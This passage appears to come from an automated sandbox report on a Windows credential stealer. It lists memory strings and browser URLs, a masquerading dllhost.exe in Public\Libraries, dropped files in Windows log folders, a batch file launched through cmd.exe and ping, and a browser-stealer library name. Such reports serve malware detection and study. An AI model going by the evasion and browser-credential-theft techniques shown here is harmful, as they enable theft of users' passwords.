00000005.00000002.4116814667.0000000013ED1000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F62000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013C08000.00000004.00000800.00020000.00000000.sdmp, 7xw9K0Vs4e.5.dr, XJq0wWYSge.5.dr, FZwLUNHu3n.5.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: dllhost.exe, 00000005.00000002.4116814667.0000000013097000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000134B6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001427F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012E58000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000140F4000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001314C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001443A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013F85000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F0C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001403F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013182000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001413E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001356A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000141CB000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000142F6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013ED1000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F62000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013C08000.00000004.00000800.00020000.00000000.sdmp, 7xw9K0Vs4e.5.dr, XJq0wWYSge.5.dr, FZwLUNHu3n.5.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: dllhost.exe, 00000005.00000002.4116814667.0000000013097000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000134B6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001427F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012E58000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000140F4000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001314C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001443A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013F85000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F0C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001403F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013182000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001413E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001356A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000141CB000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000142F6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013ED1000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F62000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013C08000.00000004.00000800.00020000.00000000.sdmp, 7xw9K0Vs4e.5.dr, XJq0wWYSge.5.dr, FZwLUNHu3n.5.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RyroOfX8Xr.5.dr	String found in binary or memory: https://support.mozilla.org
Source: RyroOfX8Xr.5.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: RyroOfX8Xr.5.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: dllhost.exe, 00000005.00000002.4116814667.0000000014695000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000137A9000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001394E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000139DA000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000137EF000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001387C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013A20000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014839000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001457D000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013994000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001450A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001464F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000147F3000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000138C2000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001447E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000144C4000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000145C3000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013836000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014609000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014721000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000147AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: dllhost.exe, 00000005.00000002.4116814667.00000000144E5000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014744000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001396F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001449F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014670000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000138E3000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000137CB000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000139B5000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013785000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014789000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001389D000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014815000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000146B6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000147CF000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000139FB000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001462A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000146FC000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013811000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013929000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001459E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000145E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: dllhost.exe, 00000005.00000002.4116814667.0000000014695000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000137A9000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001394E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000139DA000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000137EF000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001387C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013A20000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014839000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001457D000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013994000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001450A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001464F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000147F3000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000138C2000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001447E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000144C4000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000145C3000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013836000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014609000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014721000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000147AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: dllhost.exe, 00000005.00000002.4116814667.00000000144E5000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014744000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001396F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001449F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014670000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000138E3000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000137CB000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000139B5000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013785000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014789000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001389D000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014815000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000146B6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000147CF000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000139FB000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001462A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000146FC000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013811000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013929000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001459E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000145E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: dllhost.exe, 00000005.00000002.4116814667.0000000013097000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000134B6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001427F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012E58000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000140F4000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001314C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001443A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013F85000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F0C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001403F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013182000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001413E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001356A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000141CB000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000142F6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013ED1000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F62000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013C08000.00000004.00000800.00020000.00000000.sdmp, 7xw9K0Vs4e.5.dr, XJq0wWYSge.5.dr, FZwLUNHu3n.5.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: dllhost.exe, 00000005.00000002.4116814667.0000000013097000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000134B6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001427F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012E58000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000140F4000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001314C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001443A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013F85000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F0C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001403F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013182000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001413E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001356A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000141CB000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000142F6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013ED1000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F62000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013C08000.00000004.00000800.00020000.00000000.sdmp, 7xw9K0Vs4e.5.dr, XJq0wWYSge.5.dr, FZwLUNHu3n.5.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RyroOfX8Xr.5.dr	String found in binary or memory: https://www.mozilla.org
Source: RyroOfX8Xr.5.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: RyroOfX8Xr.5.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: dllhost.exe, 00000005.00000002.4116814667.0000000014878000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014D78000.00000004.00000800.00020000.00000000.sdmp, RrmUliPBZH.5.dr, RyroOfX8Xr.5.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: RyroOfX8Xr.5.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: dllhost.exe, 00000005.00000002.4116814667.0000000014878000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014D78000.00000004.00000800.00020000.00000000.sdmp, RrmUliPBZH.5.dr, RyroOfX8Xr.5.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: C:\Users\Public\Libraries\dllhost.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Source: C:\Users\Public\Libraries\dllhost.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Windows\Logs\WindowsUpdate\aVIegkftDeblliEdgtUahRSaMtI.exe	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Windows\Logs\WindowsUpdate\aVIegkftDeblliEdgtUahRSaMtI.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Windows\Logs\WindowsUpdate\74cb7468389f91	Jump to behavior

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Code function: 0_2_00007FFD9B780D68	0_2_00007FFD9B780D68
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Code function: 0_2_00007FFD9B78F8E0	0_2_00007FFD9B78F8E0
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Code function: 0_2_00007FFD9B9333BF	0_2_00007FFD9B9333BF
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Code function: 0_2_00007FFD9B934A80	0_2_00007FFD9B934A80
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Code function: 0_2_00007FFD9B932A70	0_2_00007FFD9B932A70
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Code function: 0_2_00007FFD9B933A30	0_2_00007FFD9B933A30
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Code function: 0_2_00007FFD9B935150	0_2_00007FFD9B935150
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Code function: 0_2_00007FFD9B9340C0	0_2_00007FFD9B9340C0
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Code function: 0_2_00007FFD9B9260A5	0_2_00007FFD9B9260A5
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Code function: 0_2_00007FFD9B92000A	0_2_00007FFD9B92000A
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Code function: 0_2_00007FFD9B934FF4	0_2_00007FFD9B934FF4
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Code function: 0_2_00007FFD9B9357F2	0_2_00007FFD9B9357F2
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Code function: 0_2_00007FFD9B932FD3	0_2_00007FFD9B932FD3
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Code function: 0_2_00007FFD9B932F0F	0_2_00007FFD9B932F0F
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Code function: 0_2_00007FFD9B935680	0_2_00007FFD9B935680
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Code function: 0_2_00007FFD9B933E8D	0_2_00007FFD9B933E8D
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Code function: 0_2_00007FFD9B935DFA	0_2_00007FFD9B935DFA
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Code function: 0_2_00007FFD9B933D20	0_2_00007FFD9B933D20
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Code function: 0_2_00007FFD9B932CD3	0_2_00007FFD9B932CD3
Source: C:\Users\Public\Libraries\dllhost.exe	Code function: 5_2_00007FFD9B980D68	5_2_00007FFD9B980D68
Source: C:\Users\Public\Libraries\dllhost.exe	Code function: 5_2_00007FFD9BB32A70	5_2_00007FFD9BB32A70
Source: C:\Users\Public\Libraries\dllhost.exe	Code function: 5_2_00007FFD9BB34A80	5_2_00007FFD9BB34A80
Source: C:\Users\Public\Libraries\dllhost.exe	Code function: 5_2_00007FFD9BB260A5	5_2_00007FFD9BB260A5
Source: C:\Users\Public\Libraries\dllhost.exe	Code function: 5_2_00007FFD9BB2000A	5_2_00007FFD9BB2000A
Source: C:\Users\Public\Libraries\dllhost.exe	Code function: 5_2_00007FFD9BB33E8D	5_2_00007FFD9BB33E8D
Source: C:\Users\Public\Libraries\dllhost.exe	Code function: 5_2_00007FFD9BB32CD3	5_2_00007FFD9BB32CD3
Source: C:\Users\Public\Libraries\dllhost.exe	Code function: 5_2_00007FFD9C0718B8	5_2_00007FFD9C0718B8

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\AHMSLlxy.log F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05

Source: eu6OEBpBCI.exe, 00000000.00000002.1710277485.000000001B4E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameBrowsersStealer_native.dll" vs eu6OEBpBCI.exe
Source: eu6OEBpBCI.exe, 00000000.00000002.1711981527.000000001B918000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs eu6OEBpBCI.exe
Source: eu6OEBpBCI.exe, 00000000.00000002.1711981527.000000001B918000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs eu6OEBpBCI.exe
Source: eu6OEBpBCI.exe, 00000000.00000002.1689492935.00000000140B6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBrowsersStealer_native.dll" vs eu6OEBpBCI.exe
Source: eu6OEBpBCI.exe, 00000000.00000000.1642967864.0000000000866000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs eu6OEBpBCI.exe
Source: eu6OEBpBCI.exe, 00000000.00000002.1689492935.00000000140E2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBrowsersStealer_native.dll" vs eu6OEBpBCI.exe
Source: eu6OEBpBCI.exe	Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs eu6OEBpBCI.exe

Source: eu6OEBpBCI.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: eu6OEBpBCI.exe, QXAkCaYGvsDfCLsBuBN.cs	Cryptographic APIs: 'CreateDecryptor'
Source: eu6OEBpBCI.exe, QXAkCaYGvsDfCLsBuBN.cs	Cryptographic APIs: 'CreateDecryptor'
Source: eu6OEBpBCI.exe, QXAkCaYGvsDfCLsBuBN.cs	Cryptographic APIs: 'CreateDecryptor'
Source: eu6OEBpBCI.exe, QXAkCaYGvsDfCLsBuBN.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@10/346@0/1

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe

File created: C:\Program Files (x86)\msecache\OfficeKMS\win8\aVIegkftDeblliEdgtUahRSaMtI.exe

Jump to behavior

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe

File created: C:\Users\user\Desktop\QALqtMNE.log

Jump to behavior

Source: C:\Users\Public\Libraries\dllhost.exe	Mutant created: NULL
Source: C:\Users\Public\Libraries\dllhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\e4de66e27ca81756709ec1109acd82c9f3475524ced77826337bc0426a57a8cc
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_03

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe

File created: C:\Users\user\AppData\Local\Temp\eyuu29tYGQ

Jump to behavior

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VE9VyBa20L.bat"

Source: eu6OEBpBCI.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: eu6OEBpBCI.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\Public\Libraries\dllhost.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: nUcOaDfVbT.5.dr, F67JjsYrq4.5.dr, xMl98cajDF.5.dr, 513HBVoPoN.5.dr, ZqAJ7KX2Ct.5.dr, Cbb7flGfSW.5.dr, eLhydcm2Op.5.dr, brEgAMsJt5.5.dr, nH6MOAduO3.5.dr, 8Bal7CcLLu.5.dr, X0E18zdVeb.5.dr, IAhaVPFFhh.5.dr, IGjeadakyJ.5.dr, e9yGUCfdYV.5.dr, G20l7B3AlQ.5.dr, a1EhoZIF6l.5.dr, exH5yjB6og.5.dr, eLDUeouJUe.5.dr, sQYBLZibRA.5.dr, QXlbnV9op0.5.dr, B4fFJnGqzn.5.dr, aNihLscoy4.5.dr, B4BLAnyJWo.5.dr, q5n1RB3OCR.5.dr, SfOvcqQwIT.5.dr, bmgXVaAISp.5.dr, 5vViwP0bKV.5.dr, tjgJIgiJfC.5.dr, EUCTYmGrE8.5.dr, 7Ru6QKnIyh.5.dr, vNYwIYgNuf.5.dr, 5FAzb3Seq2.5.dr, BwG4NJ1BCN.5.dr, hGDtLRxmfp.5.dr, PmaExlBgA6.5.dr, UB7rCxxeuj.5.dr, XQyLm64vpY.5.dr, r5FgsOnqpS.5.dr, 7OJ5QGdjYT.5.dr, 8QYwr1NcoC.5.dr, V2BVGwm9G7.5.dr, GOSumlJPJb.5.dr, p2cbRAuKhI.5.dr, tGh00Xz7E8.5.dr, gB8ujBkOs6.5.dr, wIGn397jZF.5.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: eu6OEBpBCI.exe

ReversingLabs: Detection: 73%

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe

File read: C:\Users\user\Desktop\eu6OEBpBCI.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\eu6OEBpBCI.exe "C:\Users\user\Desktop\eu6OEBpBCI.exe"
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VE9VyBa20L.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
